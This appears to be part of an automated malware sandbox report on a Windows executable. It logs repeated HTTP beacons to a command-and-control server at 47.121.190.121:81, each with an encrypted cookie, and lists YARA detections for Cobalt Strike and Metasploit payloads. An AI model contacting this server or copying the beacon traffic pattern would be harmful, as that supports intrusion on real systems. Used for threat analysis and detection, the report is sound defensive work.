              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:27.972239971 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:27 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              128192.168.2.45013047.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:28.103682995 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:29.079829931 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:28 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              129192.168.2.45013147.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:29.204907894 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:30.159822941 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:30 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              130192.168.2.45013247.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:30.283030987 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:31.218389034 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:31 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              131192.168.2.45013347.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:31.327210903 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:32.268121004 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:32 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              132192.168.2.45013447.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:32.394855022 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:33.362567902 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:33 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              133192.168.2.45013547.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:33.483562946 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:34.426394939 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:34 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              134192.168.2.45013647.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:34.547451973 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:35.521070957 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:35 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              135192.168.2.45013747.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:35.651355982 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:36.597840071 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:36 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              136192.168.2.45013847.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:36.727013111 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:37.679876089 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:37 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              137192.168.2.45013947.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:37.796833038 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:38.792072058 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:38 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              138192.168.2.45014047.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:38.908732891 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:39.875467062 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:39 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              139192.168.2.45014147.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:39.986138105 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:40.948199987 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:40 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              140192.168.2.45014247.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:41.067245960 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:42.114546061 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:41 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              141192.168.2.45014347.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:42.234565973 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:43.185681105 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:43 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              142192.168.2.45014447.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:43.299384117 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:44.313345909 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:44 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              143192.168.2.45014547.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:44.422158957 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:45.383543015 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:45 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              144192.168.2.45014647.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:45.500793934 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:46.458100080 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:46 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              145192.168.2.45014747.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:46.578566074 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:47.592161894 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:47 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              146192.168.2.45014847.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:47.704828024 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:48.718189001 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:48 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              147192.168.2.45014947.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:48.844898939 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:49.991286039 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:49 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              148192.168.2.45015047.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:50.119906902 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:51.068926096 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:50 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              149192.168.2.45015147.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:51.188457012 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:52.315135956 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:52 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              System Behavior

              General

              Target ID:0
              Start time:12:26:53
              Start date:09/01/2025
              Path:C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Wow64 process (32bit):false
              Commandline:"C:\Users\user\Desktop\k2vUsu5VZ5.exe"
              Imagebase:0x400000
              File size:9'728 bytes
              MD5 hash:591C92301D93D233F0AB70817DB96AFD
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.4094451143.0000000000160000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4094451143.0000000000160000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.4094451143.0000000000160000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.4094451143.0000000000160000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
              • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
              • Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Author: @VK_Intel
              • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
              Reputation:low
              Has exited:false

              Disassembly

              Reset < >

                Execution Graph

                Execution Coverage:1.7%
                Dynamic/Decrypted Code Coverage:97.2%
                Signature Coverage:6.7%
                Total number of Nodes:252
                Total number of Limit Nodes:15
